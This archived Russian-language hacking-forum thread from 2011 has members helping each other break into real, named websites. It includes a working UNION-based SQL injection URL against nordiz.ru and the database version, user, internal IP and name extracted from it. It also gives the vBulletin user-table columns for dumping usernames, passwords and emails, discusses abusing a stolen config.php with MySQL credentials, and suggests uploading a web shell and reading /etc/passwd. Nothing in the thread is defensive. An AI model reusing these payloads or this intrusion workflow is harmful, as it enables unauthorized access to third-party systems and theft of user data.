HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16541  
Старый 09.03.2011, 21:32
Kernet
Постоянный
Регистрация: 28.09.2008
Сообщений: 456
Провел на форуме:
2244151

Репутация: 404
Отправить сообщение для Kernet с помощью ICQ
По умолчанию

Не думал, что когда-то буду сюда писать...но))

_http://www.nordiz.ru/tovar.php?tovar_id=2395

Тут только посимвольно можно вытаскивать?)
 
Ответить с цитированием

  #16542  
Старый 09.03.2011, 21:48
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от Kernet  
Kernet said:
Не думал, что когда-то буду сюда писать...но))
_http://www.nordiz.ru/tovar.php?tovar_id=2395
Тут только посимвольно можно вытаскивать?)
ВНЕЗАПНО!111

http://www.nordiz.ru/news.php?newsid=119+union+select+1,version(),3,4,5 ,6,7,8,9,10,11,12,13,14,15--+
 
Ответить с цитированием

  #16543  
Старый 09.03.2011, 21:50
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Kernet  
Kernet said:
Не думал, что когда-то буду сюда писать...но))
_http://www.nordiz.ru/tovar.php?tovar_id=2395
Тут только посимвольно можно вытаскивать?)
да ,

database version: 5.1.41-log

database user: hand_mysql@10.1.104.162

database name: hand_nordis
 
Ответить с цитированием

  #16544  
Старый 09.03.2011, 22:33
Kernet
Постоянный
Регистрация: 28.09.2008
Сообщений: 456
Провел на форуме:
2244151

Репутация: 404
Отправить сообщение для Kernet с помощью ICQ
По умолчанию

мда, скульмап по 1 символу в 1.5 минуты тащит, олоооо
 
Ответить с цитированием

  #16545  
Старый 10.03.2011, 09:25
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

какая по умолчанию таблица vbulletin где храняться пользователи? и название колонок если можно
 
Ответить с цитированием

  #16546  
Старый 10.03.2011, 09:37
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от noviyuser  
noviyuser said:
какая по умолчанию таблица vbulletin где храняться пользователи? и название колонок если можно
Вот, полезный списочек http://itdefence.ru/dbitems/

Код:
Code:
Table: user
Columns:
userid
usergroupid
username
password
email
 
Ответить с цитированием

  #16547  
Старый 10.03.2011, 12:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

как можно определить жумлу к какому сайта относится кроме таблиц jos_session и jos_content и файла configuration.php (на самом деле только доступ к таблицам)?
 
Ответить с цитированием

  #16548  
Старый 10.03.2011, 12:29
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме:
44954

Репутация: 0
По умолчанию

Помогите, плз

Имею пхп-инъек..

Вытащил config.php - получил данные к mysql, но host:localhost

Вопрос: как можно узнать mysql.server???

спасибо​
 
Ответить с цитированием

  #16549  
Старый 10.03.2011, 12:30
baobabeng
Guest
Сообщений: n/a
Провел на форуме:
11371

Репутация: 0
По умолчанию

Цитата:
Сообщение от stasiliy  
stasiliy said:
Помогите, плз
Имею
пхп-инъек
..
Вытащил
config.php
- получил данные к mysql, но
host:localhost
Вопрос: как можно узнать
mysql.server
???
спасибо​
попробуй в качестве хоста указать домен этого сайта, если не прокатит, то удалённое подключение запрещено, придётся заливать шелл, либо ещё что..
 
Ответить с цитированием

  #16550  
Старый 10.03.2011, 12:34
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме:
44954

Репутация: 0
По умолчанию

Цитата:
Сообщение от baobabeng  
baobabeng said:
попробуй в качестве хоста указать домен этого сайта, если не прокатит, то удалённое подключение запрещено, придётся заливать шелл, либо ещё что..
пробовал, не выходит

А в /etc/passwd можно откопать имя пользователя???
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ